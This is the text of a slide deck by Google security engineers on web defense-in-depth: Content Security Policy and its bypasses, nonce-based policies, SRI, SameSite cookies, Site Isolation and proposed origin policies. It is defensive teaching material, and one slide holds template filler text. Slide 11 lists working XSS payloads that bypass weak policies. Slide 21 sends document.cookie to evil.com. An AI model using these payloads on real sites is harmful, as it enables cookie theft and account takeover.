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Defense-in-Depth Techniques for Modern Web Appl...

Defense-in-Depth Techniques for Modern Web Applications and Google’s Journey with CSP - Michele Spagnuolo and Lukas Weichselbaum

In this presentation, we show promising new defense-in-depth techniques to protect modern web applications from old and new classes of bugs: Suborigins to have finer-grained control over origin boundaries, Site Isolation and XSDB against Spectre and Meltdown attacks, and last but not least Origin and Feature Policy.

In addition to that, we explain new features of the upcoming CSP 3 specification like ‘unsafe-hashed-attributes’ and give an overview of how we were able to enforce CSP as a strong mitigation against cross-site scripting on over 50% of production web traffic at Google.

Michele Spagnuolo

April 13, 2018
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  1. About Us We work in a focus area of the

    Google security team (ISE) aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs. Michele Spagnuolo Senior Information Security Engineer Lukas Weichselbaum Senior Information Security Engineer
  2. Agenda ◉ Content Security Policy ◉ Subresource Integrity ◉ Same-Site

    Cookies ◉ Site Isolation, CORB & From-Origin ◉ Upcoming ◦ Suborigins ◦ Origin Policy ◦ Feature Policy
  3. What is CSP? ◉ An HTTP header developers can use

    to lock down their web applications in various ways. ◉ A defense-in-depth mechanism - it reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.
  4. CSP is NOT... ◉ A replacement for secure coding practices

    ◉ A mechanism to prevent data exfiltration
  5. The Complex World of CSP Lorem ipsum porta dolor sit

    amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. XSS • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Lorem ipsum porta dolor sit amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. 28% • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Lorem ipsum porta dolor sit amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. 36% • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Lorem ipsum porta dolor sit amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. 17% • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Lorem ipsum porta dolor sit amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. 61% • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Defense-in-depth protection against XSS XSS • Nonce-based CSP • Hash-based CSP • Whitelist-based CSP Directives - script-src - object-src - base-uri Defense-in-depth against UI-level attacks UI Directives - style-src Force HTTPS and block mixed-content HTTPS Directives - upgrade-insecure-requests - block-all-mixed-content Block everything BLOCK Directives - default-src 'none' Restrict frame ancestors and framing FRAME Directives - frame-ancestors - frame-src Lorem ipsum porta dolor sit amet nec Lorem ipsum dolor sit amet adipiscing. Donec risus dolor, porta venenatis neque pharetra luctus felis vel tellus nec felis. 61% • Donec risus dolor porta • Pharetra luctus felis • Proin vel tellus in felis • Molestie nec amet cum Prevent data-exfiltration DATA Directives - default-src - *-src
  6. CSP against XSS ◉ CSP is mostly used to mitigate

    XSS ◉ Most CSPs are based on whitelists ◦ >94% automatically bypassable ◉ Introduced 'strict-dynamic' to ease adoption of policies based on nonces
  7. CSP against XSS ◉ Whitelist-based CSP (very weak) ◦ script-src

    ajax.googleapis.com ◉ Nonce-based CSP ◦ script-src 'nonce-r4nd0m' ◉ Hash-based CSP ◦ script-src 'sha256-vbqjgmO/1eNbI...'
  8. Whitelist-Based CSP Example Content-Security-Policy default-src 'self'; script-src 'self' yep.com; report-uri

    /csp_violation_logger; money.example.com money.example.com yep.com <img src="cat.png"> <script src="//yep.com/x.js"> CSP allows CSP allows
  9. Whitelist-Based CSP Example Content-Security-Policy default-src 'self'; script-src 'self' yep.com; report-uri

    /csp_violation_logger; money.example.com money.example.co m yep.com attacker.com <img src="cat.png"> ">'><script>alert(42) </script> money.example.com/csp_violations_logger CSP blocks inline script not allowed <script src="//yep.com/x.js"> ">'><script src="//attacker.com"> CSP blocks source not whitelisted CSP allows CSP allows
  10. Whitelist-based CSP is broken "CSP Is Dead, Long Live CSP!

    On the Insecurity of Whitelists and the Future of Content Security Policy" Proceedings of the 23rd ACM Conference on Computer and Communications Security, ACM, Vienna, Austria (2016)
  11. CSP Bypasses 'unsafe-inline' in script-src script-src 'self' 'unsafe-inline'; object-src 'none';

    Bypass: ">'><script>alert(1337)</script> URL scheme/wildcard in script-src script-src 'self' https: data: *; object-src 'none'; Bypass: ">'><script src=data:text/javascript,alert(1337) ></script> Missing or lax object-src script-src 'none'; Bypass: ">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/aj ax/libs/yui/2.8.0r4/build/charts/ass ets/charts.swf?allowedDomain=\"})))} catch(e){alert(1337)}//'> <param name="AllowScriptAccess" value="always"></object> JSONP-like endpoint in whitelist script-src 'self' whitelisted.com; object-src 'none'; Bypass: ">'><script src="https://whitelisted.com/jsonp? callback=alert"> AngularJS library in whitelist script-src 'self' whitelisted.com; object-src 'none'; Bypass: "><script src="https://whitelisted.com/angular js/1.1.3/angular.min.js"></script><d iv ng-app ng-csp id=p ng-click=$event.view.alert(1337)> Missing base-uri script-src /foo.js; Bypass: ">'><base href="https://evil.com/">
  12. script-src 'nonce-r4nd0m'; object-src 'none'; base-uri 'none'; CSP based on nonces

    ▷ all <script> tags with the correct nonce attribute will get executed ▷ <script> tags injected via XSS will be blocked because of missing nonce ▷ no host/path whitelists ▷ no bypasses caused by JSONP-like endpoints on external domains ▷ no need to go through painful process of crafting/maintaining whitelist This part needs to be random for every response! Recap: How do CSP Nonces Work?
  13. money.example.com Content-Security-Policy: yep.com <script nonce="r4nd0m"> doStuff();</script> <script nonce="r4nd0m" src="//yep.com/x.js"> CSP

    allows CSP allows script-src 'nonce-r4nd0m'; report-uri /csp_violation; Recap: How do CSP Nonces Work?
  14. money.example.com attacker.com ">'><script>alert(42) </script> money.example.com/csp_violations CSP blocks script without correct

    nonce ">'><script src="//attacker.com"> CSP blocks source neither nonced nor whitelisted Content-Security-Policy: yep.com <script nonce="r4nd0m"> doStuff();</script> <script nonce="r4nd0m" src="//yep.com/x.js"> CSP allows CSP allows script-src 'nonce-r4nd0m'; report-uri /csp_violation; Recap: How do CSP Nonces Work?
  15. script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'; ▷ grant trust

    transitively via a one-use token (nonce) instead of listing whitelisted origins ▷ 'strict-dynamic' in a script-src: ◦ discards whitelists (for backward-compatibility) ◦ allows JS execution when created via e.g. document.createElement('script') Recap: What is 'strict-dynamic'?
  16. script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'; <script nonce="r4nd0m"> var

    s = document.createElement("script"); s.src = "//example.com/bar.js"; document.body.appendChild(s); </script> <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.write(s); </script> <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.body.innerHTML = s; </script> Recap: What is 'strict-dynamic'?
  17. Nonce based CSP + strict-dynamic + unsafe-eval | Level 1

    Nonce/Hash based CSP | Level 3 Nonce based CSP + strict-dynamic | Level 2 Step by step towards a stricter CSP Security Guarantees Deployment Difficulty Whitelist based + secure in absence of browser bugs + eval() based XSS mitigated + no CSP whitelist bypasses + reflected/stored XSS mitigated + javascript: URI XSS mitigated + easy to deploy w. auto-noncing templates ~ most DOM XSS mitigated
  18. Nonce based CSP + strict-dynamic + unsafe-eval | Level 1

    Nonce/Hash based CSP | Level 3 Nonce based CSP + strict-dynamic | Level 2 Step by step towards a stricter CSP Security Guarantees Deployment Difficulty script-src 'nonce-r4nd0m' 'strict-dynamic' 'unsafe-eval' object-src 'none'; base-uri 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic' object-src 'none'; base-uri 'none'; script-src 'nonce-r4nd0m' object-src 'none'; base-uri 'none'; Whitelist based
  19. New features in CSP 3 unsafe-hashed-attributes Aims to make CSP

    deployment simpler by allowing developers to enable specific inline JS handlers via hashes. <button id="action" onclick="doSubmit()"> script-src 'unsafe-hashed-attributes' 'sha256-jzgBGA4UWFFmpOBq0JpdsySukE1FrEN5bUpoK8Z29fY='
  20. New features in CSP 3 unsafe-inline-attributes (proposal) Aims to block

    attacks using <style> blocks like the CSS-keylogger* The ‘unsafe-inline-attributes’ keyword behaves similarly to ‘unsafe-inline’ but only for attributes. <button id="action" style="color:green"> style-src 'unsafe-inline-attributes' 'nonce-rAnd0m' * https://github.com/maxchehab/CSS-Keylogging
  21. Why not use CSP to prevent data exfiltration? ◉ TL;DR

    - Game over once attacker can execute JS ◉ Too many ways to exfiltrate data ◉ E.g. links are not subject to CSP: document.write("<a id='foo' href='//evil.com/"+document.cookie+"'></a>"); document.getElementById("foo").click(); ◉ Other examples: postMessage, DNS prefetch, window.open …
  22. CSP adoption at Google • Currently CSP is enforced on

    ◦ over 50% of outgoing traffic ◦ > 30 domains with 100% coverage ◦ most sensitive web applications (Login, Gmail, Docs, ...) • Goal ◦ Enforced in all new & sensitive applications ◦ Nonce only CSPs (no unsafe-eval, no strict-dynamic) for sensitive applications Google-wide strict CSP coverage
  23. What is SRI? Ensures that resources hosted on third-party servers

    have not been tampered with by specifying a hash of their expected content. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
  24. What are Same-Site Cookies? The SameSite flag in cookies allows

    servers to mitigate the risk of XSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same site.
  25. What are Same-Site Cookies? Set-Cookie: <cookie-name>=<cookie-value>; SameSite={Strict, Lax} Strict Cookies

    are not sent when there is cross-site navigation Lax Cookies are not sent when there is cross-site navigation and an "unsafe" HTTP method such as POST
  26. What is Site Isolation? A Chromium browser setting ensuring that

    pages from different websites are put into different processes and blocking the process from receiving sensitive data from other sites.
  27. What is CORB? (was XSDB) An important part of Site

    Isolation restricting which cross-origin data is sent to a renderer process, limiting the access to such data using speculative side-channel attacks like Spectre. Example: loading cross-origin HTML in <img>.
  28. What is From-Origin? (proposal) Prevents resources from being loaded and

    included by non-whitelisted origins. Mitigates inline linking and attacks such as Spectre.
  29. Suborigins (proposal) Isolate different applications running in the same origin

    by adding to a response a server-specified namespace to the origin tuple: (scheme, host, port, namespace) https://w3c.github.io/webappsec-suborigins/
  30. Use cases of Suborigins ◉ Per-user origins ◉ Segregating user

    content from the main origin ◉ Isolate sensitive functionalities ◦ /wp-admin/ ◦ /password_reset
  31. Adopting Suborigins Communication type Solution Suborigin to Suborigin Add Suborigin

    header Suborigin to Origin Add Access-Control-Allow-Suborigin Suborigin to Extern Fix Access-Control-Allow-Origin DEMO
  32. Origin Policy (proposal) Applies: • Content Security Policy • Referrer

    Policy • other policies to an entire origin, by default (like "pinning"). It complements header-based delivery, increasing coverage.
  33. Feature Policy (proposal) Selectively enables and disables different browser features

    and web APIs (from the ability to go fullscreen to disabling WebUSB). Example: in combination with Origin Policy, restrict geolocation API to a particular page, reducing attack surface in case of XSS on the domain.